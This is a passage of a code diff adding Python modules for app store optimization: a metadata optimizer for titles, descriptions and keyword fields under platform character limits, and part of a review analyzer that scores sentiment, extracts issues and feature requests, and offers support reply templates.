) -> Dict[str, Any]:
    """
    Convenience function to plan localization strategy.

    Args:
        current_market: Current market code
        budget_level: Budget level
        monthly_downloads: Current monthly downloads

    Returns:
        Complete localization plan
    """
    helper = LocalizationHelper()

    target_markets = helper.identify_target_markets(
        current_market=current_market,
        budget_level=budget_level
    )

    # Extract market codes
    market_codes = [m['language'] for m in target_markets['recommended_markets']]

    # Calculate ROI
    estimated_cost = float(target_markets['estimated_cost'].replace('$', '').replace(',', ''))

    roi_analysis = helper.calculate_localization_roi(
        market_codes,
        monthly_downloads,
        estimated_cost
    )

    return {
        'target_markets': target_markets,
        'roi_analysis': roi_analysis
    }
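The payback arithmetic in `calculate_localization_roi` above reduces to a single division guarded against zero lift. A standalone sketch of that step (the `payback_months` function name is illustrative; the $2-per-download default mirrors the module's stated assumption):

```python
def payback_months(localization_cost: float,
                   monthly_lift_downloads: int,
                   revenue_per_download: float = 2.0) -> float:
    """Months until the added revenue covers the localization spend."""
    monthly_revenue = monthly_lift_downloads * revenue_per_download
    # Guard against division by zero when no lift is expected
    return localization_cost / monthly_revenue if monthly_revenue > 0 else float('inf')

# $1,200 spend, 300 extra downloads/month at $2 each -> 2.0 months
print(payback_months(1200.0, 300))
```

Returning `float('inf')` rather than raising keeps downstream formatting (the `'N/A'` / `'Negative'` branches) simple.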
581
packages/llm/skills/app-store-optimization/metadata_optimizer.py
Normal file
@ -0,0 +1,581 @@
"""
Metadata optimization module for App Store Optimization.
Optimizes titles, descriptions, and keyword fields with platform-specific character limit validation.
"""

from typing import Dict, List, Any, Optional, Tuple
import re


class MetadataOptimizer:
    """Optimizes app store metadata for maximum discoverability and conversion."""

    # Platform-specific character limits
    CHAR_LIMITS = {
        'apple': {
            'title': 30,
            'subtitle': 30,
            'promotional_text': 170,
            'description': 4000,
            'keywords': 100,
            'whats_new': 4000
        },
        'google': {
            'title': 50,
            'short_description': 80,
            'full_description': 4000
        }
    }

    def __init__(self, platform: str = 'apple'):
        """
        Initialize metadata optimizer.

        Args:
            platform: 'apple' or 'google'
        """
        if platform not in ['apple', 'google']:
            raise ValueError("Platform must be 'apple' or 'google'")

        self.platform = platform
        self.limits = self.CHAR_LIMITS[platform]

    def optimize_title(
        self,
        app_name: str,
        target_keywords: List[str],
        include_brand: bool = True
    ) -> Dict[str, Any]:
        """
        Optimize app title with keyword integration.

        Args:
            app_name: Your app's brand name
            target_keywords: List of keywords to potentially include
            include_brand: Whether to include brand name

        Returns:
            Optimized title options with analysis
        """
        max_length = self.limits['title']

        title_options = []

        # Option 1: Brand name only
        if include_brand:
            option1 = app_name[:max_length]
            title_options.append({
                'title': option1,
                'length': len(option1),
                'remaining_chars': max_length - len(option1),
                'keywords_included': [],
                'strategy': 'brand_only',
                'pros': ['Maximum brand recognition', 'Clean and simple'],
                'cons': ['No keyword targeting', 'Lower discoverability']
            })

        # Option 2: Brand + Primary Keyword
        if target_keywords:
            primary_keyword = target_keywords[0]
            option2 = self._build_title_with_keywords(
                app_name,
                [primary_keyword],
                max_length
            )
            if option2:
                title_options.append({
                    'title': option2,
                    'length': len(option2),
                    'remaining_chars': max_length - len(option2),
                    'keywords_included': [primary_keyword],
                    'strategy': 'brand_plus_primary',
                    'pros': ['Targets main keyword', 'Maintains brand identity'],
                    'cons': ['Limited keyword coverage']
                })

        # Option 3: Brand + Multiple Keywords (if space allows)
        if len(target_keywords) > 1:
            option3 = self._build_title_with_keywords(
                app_name,
                target_keywords[:2],
                max_length
            )
            if option3:
                title_options.append({
                    'title': option3,
                    'length': len(option3),
                    'remaining_chars': max_length - len(option3),
                    'keywords_included': target_keywords[:2],
                    'strategy': 'brand_plus_multiple',
                    'pros': ['Multiple keyword targets', 'Better discoverability'],
                    'cons': ['May feel cluttered', 'Less brand focus']
                })

        # Option 4: Keyword-first approach (for new apps)
        if target_keywords and not include_brand:
            option4 = " ".join(target_keywords[:2])[:max_length]
            title_options.append({
                'title': option4,
                'length': len(option4),
                'remaining_chars': max_length - len(option4),
                'keywords_included': target_keywords[:2],
                'strategy': 'keyword_first',
                'pros': ['Maximum SEO benefit', 'Clear functionality'],
                'cons': ['No brand recognition', 'Generic appearance']
            })

        return {
            'platform': self.platform,
            'max_length': max_length,
            'options': title_options,
            'recommendation': self._recommend_title_option(title_options)
        }

    def optimize_description(
        self,
        app_info: Dict[str, Any],
        target_keywords: List[str],
        description_type: str = 'full'
    ) -> Dict[str, Any]:
        """
        Optimize app description with keyword integration and conversion focus.

        Args:
            app_info: Dict with 'name', 'key_features', 'unique_value', 'target_audience'
|
||||
target_keywords: List of keywords to integrate naturally
|
||||
description_type: 'full', 'short' (Google), 'subtitle' (Apple)
|
||||
|
||||
Returns:
|
||||
Optimized description with analysis
|
||||
"""
|
||||
if description_type == 'short' and self.platform == 'google':
|
||||
return self._optimize_short_description(app_info, target_keywords)
|
||||
elif description_type == 'subtitle' and self.platform == 'apple':
|
||||
return self._optimize_subtitle(app_info, target_keywords)
|
||||
else:
|
||||
return self._optimize_full_description(app_info, target_keywords)
|
||||
|
||||
def optimize_keyword_field(
|
||||
self,
|
||||
target_keywords: List[str],
|
||||
app_title: str = "",
|
||||
app_description: str = ""
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Optimize Apple's 100-character keyword field.
|
||||
|
||||
Rules:
|
||||
- No spaces between commas
|
||||
- No plural forms if singular exists
|
||||
- No duplicates
|
||||
- Keywords in title/subtitle are already indexed
|
||||
|
||||
Args:
|
||||
target_keywords: List of target keywords
|
||||
app_title: Current app title (to avoid duplication)
|
||||
app_description: Current description (to check coverage)
|
||||
|
||||
Returns:
|
||||
Optimized keyword field (comma-separated, no spaces)
|
||||
"""
|
||||
if self.platform != 'apple':
|
||||
return {'error': 'Keyword field optimization only applies to Apple App Store'}
|
||||
|
||||
max_length = self.limits['keywords']
|
||||
|
||||
# Extract words already in title (these don't need to be in keyword field)
|
||||
title_words = set(app_title.lower().split()) if app_title else set()
|
||||
|
||||
# Process keywords
|
||||
processed_keywords = []
|
||||
for keyword in target_keywords:
|
||||
keyword_lower = keyword.lower().strip()
|
||||
|
||||
# Skip if already in title
|
||||
if keyword_lower in title_words:
|
||||
continue
|
||||
|
||||
# Remove duplicates and process
|
||||
words = keyword_lower.split()
|
||||
for word in words:
|
||||
if word not in processed_keywords and word not in title_words:
|
||||
processed_keywords.append(word)
|
||||
|
||||
# Remove plurals if singular exists
|
||||
deduplicated = self._remove_plural_duplicates(processed_keywords)
|
||||
|
||||
# Build keyword field within 100 character limit
|
||||
keyword_field = self._build_keyword_field(deduplicated, max_length)
|
||||
|
||||
# Calculate keyword density in description
|
||||
density = self._calculate_coverage(target_keywords, app_description)
|
||||
|
||||
return {
|
||||
'keyword_field': keyword_field,
|
||||
'length': len(keyword_field),
|
||||
'remaining_chars': max_length - len(keyword_field),
|
||||
'keywords_included': keyword_field.split(','),
|
||||
'keywords_count': len(keyword_field.split(',')),
|
||||
'keywords_excluded': [kw for kw in target_keywords if kw.lower() not in keyword_field],
|
||||
'description_coverage': density,
|
||||
'optimization_tips': [
|
||||
'Keywords in title are auto-indexed - no need to repeat',
|
||||
'Use singular forms only (Apple indexes plurals automatically)',
|
||||
'No spaces between commas to maximize character usage',
|
||||
'Update keyword field with each app update to test variations'
|
||||
]
|
||||
}
|
||||
|
||||
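The keyword-field packing rule above (comma-separated, no spaces, stop before the cap) can be sketched standalone; `build_keyword_field` is a hypothetical name used only for this illustration, not part of the module.

```python
# Hypothetical standalone sketch of the keyword-field packing rule:
# join keywords with commas (no spaces) and stop before exceeding the cap.
def build_keyword_field(keywords, max_length=100):
    field = ""
    for kw in keywords:
        candidate = f"{field},{kw}" if field else kw
        if len(candidate) <= max_length:
            field = candidate
        else:
            break  # adding this keyword would overflow the field
    return field

print(build_keyword_field(["meditation", "sleep", "focus"], max_length=24))
# → meditation,sleep,focus
```

Note that the greedy cutoff keeps earlier (higher-priority) keywords, so the input list should already be sorted by importance.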
    def validate_character_limits(
        self,
        metadata: Dict[str, str]
    ) -> Dict[str, Any]:
        """
        Validate all metadata fields against platform character limits.

        Args:
            metadata: Dictionary of field_name: value

        Returns:
            Validation report with errors and warnings
        """
        validation_results = {
            'is_valid': True,
            'errors': [],
            'warnings': [],
            'field_status': {}
        }

        for field_name, value in metadata.items():
            if field_name not in self.limits:
                validation_results['warnings'].append(
                    f"Unknown field '{field_name}' for {self.platform} platform"
                )
                continue

            max_length = self.limits[field_name]
            actual_length = len(value)
            remaining = max_length - actual_length

            field_status = {
                'value': value,
                'length': actual_length,
                'limit': max_length,
                'remaining': remaining,
                'is_valid': actual_length <= max_length,
                'usage_percentage': round((actual_length / max_length) * 100, 1)
            }

            validation_results['field_status'][field_name] = field_status

            if actual_length > max_length:
                validation_results['is_valid'] = False
                validation_results['errors'].append(
                    f"'{field_name}' exceeds limit: {actual_length}/{max_length} chars"
                )
            elif remaining > max_length * 0.2:  # More than 20% unused
                validation_results['warnings'].append(
                    f"'{field_name}' under-utilizes space: {remaining} chars remaining"
                )

        return validation_results

    def calculate_keyword_density(
        self,
        text: str,
        target_keywords: List[str]
    ) -> Dict[str, Any]:
        """
        Calculate keyword density in text.

        Args:
            text: Text to analyze
            target_keywords: Keywords to check

        Returns:
            Density analysis
        """
        text_lower = text.lower()
        total_words = len(text_lower.split())

        keyword_densities = {}
        for keyword in target_keywords:
            keyword_lower = keyword.lower()
            count = text_lower.count(keyword_lower)
            density = (count / total_words * 100) if total_words > 0 else 0

            keyword_densities[keyword] = {
                'occurrences': count,
                'density_percentage': round(density, 2),
                'status': self._assess_density(density)
            }

        # Overall assessment
        total_keyword_occurrences = sum(kw['occurrences'] for kw in keyword_densities.values())
        overall_density = (total_keyword_occurrences / total_words * 100) if total_words > 0 else 0

        return {
            'total_words': total_words,
            'keyword_densities': keyword_densities,
            'overall_keyword_density': round(overall_density, 2),
            'assessment': self._assess_overall_density(overall_density),
            'recommendations': self._generate_density_recommendations(keyword_densities)
        }
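The density math above reduces to substring occurrences divided by total word count; a self-contained sketch (the function name is hypothetical, introduced only for illustration):

```python
# Hypothetical sketch of the density formula used above:
# density% = substring occurrences / total word count * 100
def keyword_density(text, keyword):
    words = text.lower().split()
    if not words:
        return 0.0
    count = text.lower().count(keyword.lower())
    return round(count / len(words) * 100, 2)

print(keyword_density("sleep well, track sleep, improve sleep quality", "sleep"))
# → 42.86  (3 occurrences / 7 words)
```

Because `str.count` matches substrings, partial matches (e.g. "sleeping") also count toward density, the same trade-off the method above makes.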
    def _build_title_with_keywords(
        self,
        app_name: str,
        keywords: List[str],
        max_length: int
    ) -> Optional[str]:
        """Build a title combining app name and keywords within the limit."""
        separators = [' - ', ': ', ' | ']

        for sep in separators:
            for kw in keywords:
                title = f"{app_name}{sep}{kw}"
                if len(title) <= max_length:
                    return title

        return None

    def _optimize_short_description(
        self,
        app_info: Dict[str, Any],
        target_keywords: List[str]
    ) -> Dict[str, Any]:
        """Optimize Google Play short description (80 chars)."""
        max_length = self.limits['short_description']

        # Focus on the unique value proposition with the primary keyword
        unique_value = app_info.get('unique_value', '')
        primary_keyword = target_keywords[0] if target_keywords else ''

        # Template: [Primary Keyword] - [Unique Value]
        short_desc = f"{primary_keyword.title()} - {unique_value}"[:max_length]

        return {
            'short_description': short_desc,
            'length': len(short_desc),
            'remaining_chars': max_length - len(short_desc),
            'keywords_included': [primary_keyword] if primary_keyword in short_desc.lower() else [],
            'strategy': 'keyword_value_proposition'
        }

    def _optimize_subtitle(
        self,
        app_info: Dict[str, Any],
        target_keywords: List[str]
    ) -> Dict[str, Any]:
        """Optimize Apple App Store subtitle (30 chars)."""
        max_length = self.limits['subtitle']

        # Very concise - primary keyword or key feature
        primary_keyword = target_keywords[0] if target_keywords else ''
        key_feature = app_info.get('key_features', [''])[0] if app_info.get('key_features') else ''

        options = [
            primary_keyword[:max_length],
            key_feature[:max_length],
            f"{primary_keyword} App"[:max_length]
        ]

        return {
            'subtitle_options': [opt for opt in options if opt],
            'max_length': max_length,
            'recommendation': options[0] if options else ''
        }

    def _optimize_full_description(
        self,
        app_info: Dict[str, Any],
        target_keywords: List[str]
    ) -> Dict[str, Any]:
        """Optimize the full app description (4000 chars on both platforms)."""
        max_length = self.limits.get('description', self.limits.get('full_description', 4000))

        # Structure: Hook -> Features -> Benefits -> Social Proof -> CTA
        sections = []

        # Hook (with primary keyword)
        primary_keyword = target_keywords[0] if target_keywords else ''
        unique_value = app_info.get('unique_value', '')
        hook = f"{unique_value} {primary_keyword.title()} that helps you achieve more.\n\n"
        sections.append(hook)

        # Features (with keywords integrated naturally)
        features = app_info.get('key_features', [])
        if features:
            sections.append("KEY FEATURES:\n")
            for i, feature in enumerate(features[:5], 1):
                feature_text = f"• {feature}"
                if i <= len(target_keywords):
                    keyword = target_keywords[i - 1]
                    if keyword.lower() not in feature.lower():
                        feature_text = f"• {feature} with {keyword}"
                sections.append(f"{feature_text}\n")
            sections.append("\n")

        # Benefits
        target_audience = app_info.get('target_audience', 'users')
        sections.append(f"PERFECT FOR:\n{target_audience}\n\n")

        # Social proof placeholder
        sections.append("WHY USERS LOVE US:\n")
        sections.append("Join thousands of satisfied users who have transformed their workflow.\n\n")

        # CTA
        sections.append("Download now and start experiencing the difference!")

        # Combine and enforce the length limit
        full_description = "".join(sections)
        if len(full_description) > max_length:
            full_description = full_description[:max_length - 3] + "..."

        # Calculate keyword density
        density = self.calculate_keyword_density(full_description, target_keywords)

        return {
            'full_description': full_description,
            'length': len(full_description),
            'remaining_chars': max_length - len(full_description),
            'keyword_analysis': density,
            'structure': {
                'has_hook': True,
                'has_features': len(features) > 0,
                'has_benefits': True,
                'has_cta': True
            }
        }

    def _remove_plural_duplicates(self, keywords: List[str]) -> List[str]:
        """Remove plural forms if the singular exists."""
        deduplicated = []
        singular_set = set()

        for keyword in keywords:
            if keyword.endswith('s') and len(keyword) > 1:
                singular = keyword[:-1]
                if singular not in singular_set:
                    deduplicated.append(singular)
                    singular_set.add(singular)
            else:
                if keyword not in singular_set:
                    deduplicated.append(keyword)
                    singular_set.add(keyword)

        return deduplicated

    def _build_keyword_field(self, keywords: List[str], max_length: int) -> str:
        """Build a comma-separated keyword field within the character limit."""
        keyword_field = ""

        for keyword in keywords:
            test_field = f"{keyword_field},{keyword}" if keyword_field else keyword
            if len(test_field) <= max_length:
                keyword_field = test_field
            else:
                break

        return keyword_field

    def _calculate_coverage(self, keywords: List[str], text: str) -> Dict[str, int]:
        """Count how often each keyword appears in the text."""
        text_lower = text.lower()
        coverage = {}

        for keyword in keywords:
            coverage[keyword] = text_lower.count(keyword.lower())

        return coverage

    def _assess_density(self, density: float) -> str:
        """Assess an individual keyword's density."""
        if density < 0.5:
            return "too_low"
        elif density <= 2.5:
            return "optimal"
        else:
            return "too_high"

    def _assess_overall_density(self, density: float) -> str:
        """Assess overall keyword density."""
        if density < 2:
            return "Under-optimized: Consider adding more keyword variations"
        elif density <= 5:
            return "Optimal: Good keyword integration without stuffing"
        elif density <= 8:
            return "High: Approaching keyword stuffing - reduce keyword usage"
        else:
            return "Too High: Keyword stuffing detected - rewrite for natural flow"

    def _generate_density_recommendations(
        self,
        keyword_densities: Dict[str, Dict[str, Any]]
    ) -> List[str]:
        """Generate recommendations based on keyword density analysis."""
        recommendations = []

        for keyword, data in keyword_densities.items():
            if data['status'] == 'too_low':
                recommendations.append(
                    f"Increase usage of '{keyword}' - currently only {data['occurrences']} times"
                )
            elif data['status'] == 'too_high':
                recommendations.append(
                    f"Reduce usage of '{keyword}' - appears {data['occurrences']} times (keyword stuffing risk)"
                )

        if not recommendations:
            recommendations.append("Keyword density is well-balanced")

        return recommendations

    def _recommend_title_option(self, options: List[Dict[str, Any]]) -> str:
        """Recommend the best title option based on strategy."""
        if not options:
            return "No valid options available"

        # Prefer brand_plus_primary for established apps
        for option in options:
            if option['strategy'] == 'brand_plus_primary':
                return f"Recommended: '{option['title']}' (Balance of brand and SEO)"

        # Fall back to the first option
        return f"Recommended: '{options[0]['title']}' ({options[0]['strategy']})"


def optimize_app_metadata(
    platform: str,
    app_info: Dict[str, Any],
    target_keywords: List[str]
) -> Dict[str, Any]:
    """
    Convenience function to optimize all metadata fields.

    Args:
        platform: 'apple' or 'google'
        app_info: App information dictionary
        target_keywords: Target keywords list

    Returns:
        Complete metadata optimization package
    """
    optimizer = MetadataOptimizer(platform)

    return {
        'platform': platform,
        'title': optimizer.optimize_title(
            app_info['name'],
            target_keywords
        ),
        'description': optimizer.optimize_description(
            app_info,
            target_keywords,
            'full'
        ),
        'keyword_field': optimizer.optimize_keyword_field(
            target_keywords
        ) if platform == 'apple' else None
    }
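The singular/plural deduplication used by `_remove_plural_duplicates` is intentionally naive (it just strips a trailing "s", so irregular plurals and words like "gps" are mishandled); a standalone sketch of that rule, with a hypothetical function name:

```python
# Hypothetical sketch of the naive plural-stripping dedup above:
# any keyword ending in 's' is reduced to its singular form first,
# then duplicates of the reduced form are dropped.
def dedupe_plurals(keywords):
    seen, result = set(), []
    for kw in keywords:
        base = kw[:-1] if kw.endswith('s') and len(kw) > 1 else kw
        if base not in seen:
            seen.add(base)
            result.append(base)
    return result

print(dedupe_plurals(["note", "notes", "task", "tasks", "todo"]))
# → ['note', 'task', 'todo']
```

This is acceptable for Apple's keyword field because the store indexes plural variants automatically, as the optimization tips above note.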
714 packages/llm/skills/app-store-optimization/review_analyzer.py Normal file
@ -0,0 +1,714 @@
"""
Review analysis module for App Store Optimization.
Analyzes user reviews for sentiment, issues, and feature requests.
"""

from typing import Dict, List, Any, Optional, Tuple
from collections import Counter
import re


class ReviewAnalyzer:
    """Analyzes user reviews for actionable insights."""

    # Sentiment keywords
    POSITIVE_KEYWORDS = [
        'great', 'awesome', 'excellent', 'amazing', 'love', 'best', 'perfect',
        'fantastic', 'wonderful', 'brilliant', 'outstanding', 'superb'
    ]

    NEGATIVE_KEYWORDS = [
        'bad', 'terrible', 'awful', 'horrible', 'hate', 'worst', 'useless',
        'broken', 'crash', 'bug', 'slow', 'disappointing', 'frustrating'
    ]

    # Issue indicators
    ISSUE_KEYWORDS = [
        'crash', 'bug', 'error', 'broken', 'not working', 'doesnt work',
        'freezes', 'slow', 'laggy', 'glitch', 'problem', 'issue', 'fail'
    ]

    # Feature request indicators
    FEATURE_REQUEST_KEYWORDS = [
        'wish', 'would be nice', 'should add', 'need', 'want', 'hope',
        'please add', 'missing', 'lacks', 'feature request'
    ]

    def __init__(self, app_name: str):
        """
        Initialize review analyzer.

        Args:
            app_name: Name of the app
        """
        self.app_name = app_name
        self.reviews = []
        self.analysis_cache = {}

    def analyze_sentiment(
        self,
        reviews: List[Dict[str, Any]]
    ) -> Dict[str, Any]:
        """
        Analyze sentiment across reviews.

        Args:
            reviews: List of review dicts with 'text', 'rating', 'date'

        Returns:
            Sentiment analysis summary
        """
        self.reviews = reviews

        sentiment_counts = {
            'positive': 0,
            'neutral': 0,
            'negative': 0
        }

        detailed_sentiments = []

        for review in reviews:
            text = review.get('text', '').lower()
            rating = review.get('rating', 3)

            # Calculate sentiment score
            sentiment_score = self._calculate_sentiment_score(text, rating)
            sentiment_category = self._categorize_sentiment(sentiment_score)

            sentiment_counts[sentiment_category] += 1

            detailed_sentiments.append({
                'review_id': review.get('id', ''),
                'rating': rating,
                'sentiment_score': sentiment_score,
                'sentiment': sentiment_category,
                'text_preview': text[:100] + '...' if len(text) > 100 else text
            })

        # Calculate percentages
        total = len(reviews)
        sentiment_distribution = {
            'positive': round((sentiment_counts['positive'] / total) * 100, 1) if total > 0 else 0,
            'neutral': round((sentiment_counts['neutral'] / total) * 100, 1) if total > 0 else 0,
            'negative': round((sentiment_counts['negative'] / total) * 100, 1) if total > 0 else 0
        }

        # Calculate average rating
        avg_rating = sum(r.get('rating', 0) for r in reviews) / total if total > 0 else 0

        return {
            'total_reviews_analyzed': total,
            'average_rating': round(avg_rating, 2),
            'sentiment_distribution': sentiment_distribution,
            'sentiment_counts': sentiment_counts,
            'sentiment_trend': self._assess_sentiment_trend(sentiment_distribution),
            'detailed_sentiments': detailed_sentiments[:50]  # Limit output
        }

    def extract_common_themes(
        self,
        reviews: List[Dict[str, Any]],
        min_mentions: int = 3
    ) -> Dict[str, Any]:
        """
        Extract frequently mentioned themes and topics.

        Args:
            reviews: List of review dicts
            min_mentions: Minimum mentions to be considered common

        Returns:
            Common themes analysis
        """
        all_words = []
        all_phrases = []

        # Filter out common words
        stop_words = {
            'the', 'and', 'for', 'with', 'this', 'that', 'from', 'have',
            'app', 'apps', 'very', 'really', 'just', 'but', 'not', 'you'
        }

        for review in reviews:
            text = review.get('text', '').lower()
            # Clean text
            text = re.sub(r'[^\w\s]', ' ', text)
            words = text.split()
            words = [w for w in words if w not in stop_words and len(w) > 3]

            all_words.extend(words)

            # Extract two-word phrases
            for i in range(len(words) - 1):
                phrase = f"{words[i]} {words[i+1]}"
                all_phrases.append(phrase)

        # Count frequency
        word_freq = Counter(all_words)
        phrase_freq = Counter(all_phrases)

        # Filter by min_mentions
        common_words = [
            {'word': word, 'mentions': count}
            for word, count in word_freq.most_common(30)
            if count >= min_mentions
        ]

        common_phrases = [
            {'phrase': phrase, 'mentions': count}
            for phrase, count in phrase_freq.most_common(20)
            if count >= min_mentions
        ]

        # Categorize themes
        themes = self._categorize_themes(common_words, common_phrases)

        return {
            'common_words': common_words,
            'common_phrases': common_phrases,
            'identified_themes': themes,
            'insights': self._generate_theme_insights(themes)
        }

    def identify_issues(
        self,
        reviews: List[Dict[str, Any]],
        rating_threshold: int = 3
    ) -> Dict[str, Any]:
        """
        Identify bugs, crashes, and other issues from reviews.

        Args:
            reviews: List of review dicts
            rating_threshold: Only analyze reviews at or below this rating

        Returns:
            Issue identification report
        """
        issues = []

        for review in reviews:
            rating = review.get('rating', 5)
            if rating > rating_threshold:
                continue

            text = review.get('text', '').lower()

            # Check for issue keywords
            mentioned_issues = []
            for keyword in self.ISSUE_KEYWORDS:
                if keyword in text:
                    mentioned_issues.append(keyword)

            if mentioned_issues:
                issues.append({
                    'review_id': review.get('id', ''),
                    'rating': rating,
                    'date': review.get('date', ''),
                    'issue_keywords': mentioned_issues,
                    'text': text[:200] + '...' if len(text) > 200 else text
                })

        # Group by issue type
        issue_frequency = Counter()
        for issue in issues:
            for keyword in issue['issue_keywords']:
                issue_frequency[keyword] += 1

        # Categorize issues
        categorized_issues = self._categorize_issues(issues)

        # Calculate issue severity
        severity_scores = self._calculate_issue_severity(
            categorized_issues,
            len(reviews)
        )

        return {
            'total_issues_found': len(issues),
            'issue_frequency': dict(issue_frequency.most_common(15)),
            'categorized_issues': categorized_issues,
            'severity_scores': severity_scores,
            'top_issues': self._rank_issues_by_severity(severity_scores),
            'recommendations': self._generate_issue_recommendations(
                categorized_issues,
                severity_scores
            )
        }
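The issue scan in `identify_issues` boils down to keyword membership tests over low-rated reviews plus a `Counter`; a standalone sketch with a trimmed keyword list and a hypothetical function name:

```python
from collections import Counter

# Hypothetical sketch of the low-rating issue scan above:
# count issue keywords mentioned in reviews rated at or below the threshold.
ISSUE_KEYWORDS = ['crash', 'bug', 'slow']

def count_issues(reviews, rating_threshold=3):
    freq = Counter()
    for review in reviews:
        if review['rating'] > rating_threshold:
            continue  # high-rated reviews are not scanned for issues
        text = review['text'].lower()
        freq.update(kw for kw in ISSUE_KEYWORDS if kw in text)
    return freq

reviews = [
    {'rating': 1, 'text': 'Constant crash after update'},
    {'rating': 2, 'text': 'So slow and full of bugs'},
    {'rating': 5, 'text': 'No bugs for me, love it'},
]
print(count_issues(reviews))
```

As in the method above, substring matching means "bugs" counts for "bug"; the five-star review is excluded by the rating filter even though it mentions "bugs".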
    def find_feature_requests(
        self,
        reviews: List[Dict[str, Any]]
    ) -> Dict[str, Any]:
        """
        Extract feature requests and desired improvements.

        Args:
            reviews: List of review dicts

        Returns:
            Feature request analysis
        """
        feature_requests = []

        for review in reviews:
            text = review.get('text', '').lower()
            rating = review.get('rating', 3)

            # Check for feature request indicators
            is_feature_request = any(
                keyword in text
                for keyword in self.FEATURE_REQUEST_KEYWORDS
            )

            if is_feature_request:
                # Extract the specific request
                request_text = self._extract_feature_request_text(text)

                feature_requests.append({
                    'review_id': review.get('id', ''),
                    'rating': rating,
                    'date': review.get('date', ''),
                    'request_text': request_text,
                    'full_review': text[:200] + '...' if len(text) > 200 else text
                })

        # Cluster similar requests
        clustered_requests = self._cluster_feature_requests(feature_requests)

        # Prioritize based on frequency and rating context
        prioritized_requests = self._prioritize_feature_requests(clustered_requests)

        return {
            'total_feature_requests': len(feature_requests),
            'clustered_requests': clustered_requests,
            'prioritized_requests': prioritized_requests,
            'implementation_recommendations': self._generate_feature_recommendations(
                prioritized_requests
            )
        }

    def track_sentiment_trends(
        self,
        reviews_by_period: Dict[str, List[Dict[str, Any]]]
    ) -> Dict[str, Any]:
        """
        Track sentiment changes over time.

        Args:
            reviews_by_period: Dict of period_name: reviews

        Returns:
            Trend analysis
        """
        trends = []

        for period, reviews in reviews_by_period.items():
            sentiment = self.analyze_sentiment(reviews)

            trends.append({
                'period': period,
                'total_reviews': len(reviews),
                'average_rating': sentiment['average_rating'],
                'positive_percentage': sentiment['sentiment_distribution']['positive'],
                'negative_percentage': sentiment['sentiment_distribution']['negative']
            })

        # Calculate trend direction
        if len(trends) >= 2:
            first_period = trends[0]
            last_period = trends[-1]

            rating_change = last_period['average_rating'] - first_period['average_rating']
            sentiment_change = last_period['positive_percentage'] - first_period['positive_percentage']

            trend_direction = self._determine_trend_direction(
                rating_change,
                sentiment_change
            )
        else:
            trend_direction = 'insufficient_data'

        return {
            'periods_analyzed': len(trends),
            'trend_data': trends,
            'trend_direction': trend_direction,
            'insights': self._generate_trend_insights(trends, trend_direction)
        }
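The module's `_determine_trend_direction` helper is defined elsewhere and its exact rule is not shown here; one plausible sketch, using only the two deltas computed above (the function name and thresholds are assumptions):

```python
# Hypothetical trend-direction rule over the deltas computed above;
# the module's actual _determine_trend_direction may differ.
def trend_direction(rating_change, sentiment_change):
    if rating_change > 0 and sentiment_change > 0:
        return 'improving'   # both rating and positive share rose
    if rating_change < 0 and sentiment_change < 0:
        return 'declining'   # both fell
    return 'stable'          # mixed or flat signals

print(trend_direction(0.4, 6.0))
# → improving
```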
    def generate_response_templates(
        self,
        issue_category: str
    ) -> List[Dict[str, str]]:
        """
        Generate response templates for common review scenarios.

        Args:
            issue_category: Category of issue ('crash', 'feature_request', 'positive', etc.)

        Returns:
            Response templates
        """
        templates = {
            'crash': [
                {
                    'scenario': 'App crash reported',
                    'template': "Thank you for bringing this to our attention. We're sorry you experienced a crash. "
                                "Our team is investigating this issue. Could you please share more details about when "
                                "this occurred (device model, iOS/Android version) by contacting support@[company].com? "
                                "We're committed to fixing this quickly."
                },
                {
                    'scenario': 'Crash already fixed',
                    'template': "Thank you for your feedback. We've identified and fixed this crash issue in version [X.X]. "
                                "Please update to the latest version. If the problem persists, please reach out to "
                                "support@[company].com and we'll help you directly."
                }
            ],
            'bug': [
                {
                    'scenario': 'Bug reported',
                    'template': "Thanks for reporting this bug. We take these issues seriously. Our team is looking into it "
                                "and we'll have a fix in an upcoming update. We appreciate your patience and will notify you "
                                "when it's resolved."
                }
            ],
            'feature_request': [
                {
                    'scenario': 'Feature request received',
                    'template': "Thank you for this suggestion! We're always looking to improve [app_name]. We've added your "
                                "request to our roadmap and will consider it for a future update. Follow us @[social] for "
                                "updates on new features."
                },
                {
                    'scenario': 'Feature already planned',
                    'template': "Great news! This feature is already on our roadmap and we're working on it. Stay tuned for "
                                "updates in the coming months. Thanks for your feedback!"
                }
            ],
            'positive': [
                {
                    'scenario': 'Positive review',
                    'template': "Thank you so much for your kind words! We're thrilled that you're enjoying [app_name]. "
                                "Reviews like yours motivate our team to keep improving. If you ever have suggestions, "
                                "we'd love to hear them!"
                }
            ],
            'negative_general': [
                {
                    'scenario': 'General complaint',
                    'template': "We're sorry to hear you're not satisfied with your experience. We'd like to make this right. "
                                "Please contact us at support@[company].com so we can understand the issue better and help "
                                "you directly. Thank you for giving us a chance to improve."
                }
            ]
        }

        return templates.get(issue_category, templates['negative_general'])
    def _calculate_sentiment_score(self, text: str, rating: int) -> float:
        """Calculate a sentiment score in [-1, 1]."""
        # Start with a rating-based score: map 1-5 stars onto -1..1
        rating_score = (rating - 3) / 2

        # Adjust based on text sentiment
        positive_count = sum(1 for keyword in self.POSITIVE_KEYWORDS if keyword in text)
        negative_count = sum(1 for keyword in self.NEGATIVE_KEYWORDS if keyword in text)

        text_score = (positive_count - negative_count) / 10  # Normalize

        # Weighted average (60% rating, 40% text)
        final_score = (rating_score * 0.6) + (text_score * 0.4)

        return max(min(final_score, 1.0), -1.0)

    def _categorize_sentiment(self, score: float) -> str:
        """Categorize a sentiment score."""
        if score > 0.3:
            return 'positive'
        elif score < -0.3:
            return 'negative'
        else:
            return 'neutral'

    def _assess_sentiment_trend(self, distribution: Dict[str, float]) -> str:
        """Assess the overall sentiment trend."""
        positive = distribution['positive']
        negative = distribution['negative']

        if positive > 70:
            return 'very_positive'
        elif positive > 50:
            return 'positive'
        # Check the stricter threshold first, otherwise 'critical' is unreachable
        elif negative > 50:
            return 'critical'
        elif negative > 30:
            return 'concerning'
        else:
            return 'mixed'
|
||||
    def _categorize_themes(
        self,
        common_words: List[Dict[str, Any]],
        common_phrases: List[Dict[str, Any]]
    ) -> Dict[str, List[str]]:
        """Categorize themes from words and phrases."""
        themes = {
            'features': [],
            'performance': [],
            'usability': [],
            'support': [],
            'pricing': []
        }

        # Keywords for each category
        feature_keywords = {'feature', 'functionality', 'option', 'tool'}
        performance_keywords = {'fast', 'slow', 'crash', 'lag', 'speed', 'performance'}
        usability_keywords = {'easy', 'difficult', 'intuitive', 'confusing', 'interface', 'design'}
